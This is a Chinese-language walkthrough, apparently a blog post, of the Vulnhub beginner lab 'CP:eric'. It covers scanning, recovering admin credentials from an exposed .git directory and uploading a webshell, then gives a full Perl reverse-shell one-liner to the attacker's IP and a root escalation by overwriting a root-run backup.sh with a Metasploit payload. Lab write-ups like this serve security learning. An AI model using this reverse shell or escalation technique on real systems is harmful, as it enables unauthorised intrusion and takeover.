Vulnhub之CP:eric渗透实战

Vulnhub之CP:eric渗透实战

一、环境搭建
目标:
a、/root/flag.txt
b、/home/eric/flag.txt
难度:初学者
下载链接:https://isz.no/vm/eric.7z
我是用的VirtualBox进行测试的哦!
攻击机:kali linux 2019 IP地址为192.168.34.179

二、渗透实战过程
1、靶机发现、目录爆破
发现靶机 nmap -sP 192.168.34.0/24
在这里插入图片描述
对Ip地址进行nmap扫描 nmap -sV 192.168.34.154
在这里插入图片描述
存在80端口,访问网站,感觉什么发现
在这里插入图片描述
使用dirb进行目录扫描,目录字典用默认字典 dirb http://192.168.34.154
在这里插入图片描述
发现几个可疑的点:(1).git可能存在文件泄露
(2)admin.php 登录界面使用各种爆破及注入无果,想想通过什么方法找用户名密码
(3)upload 可能存在文件上传漏洞
使用GitHck对目录进行扫描,下载下了index.php admin.php
在admin.php发现了用户名和密码:admin/st@mpch0rdt.ightiRu$glo0mappL3,登录页面
在这里插入图片描述
发现了上传页面
2、利用文件上传漏洞,反弹shell
直接上大马,上传成功后返回大马页面
在这里插入图片描述
连接kali,反弹shell
kali监听端口4444 nc -lvp 4444
在这里插入图片描述
查看第一个flag cat /homr/eric/flag.txt
3、提权
本靶机不存在python,但存在perl
在这里插入图片描述
上脚本:perl -e 'use Socket;$i="192.168.34.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
在这里插入图片描述
反弹shell,发现/home/eric目录下存在backup.sh,可以以root的身份执行
使用msf生产sh文件
在这里插入图片描述
覆盖原来的backup.php,并执行backup.sh,有时候反弹不成功,多执行几次就可以了
在这里插入图片描述
在这里插入图片描述
得到了root权限,cat /root/flag.txt
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值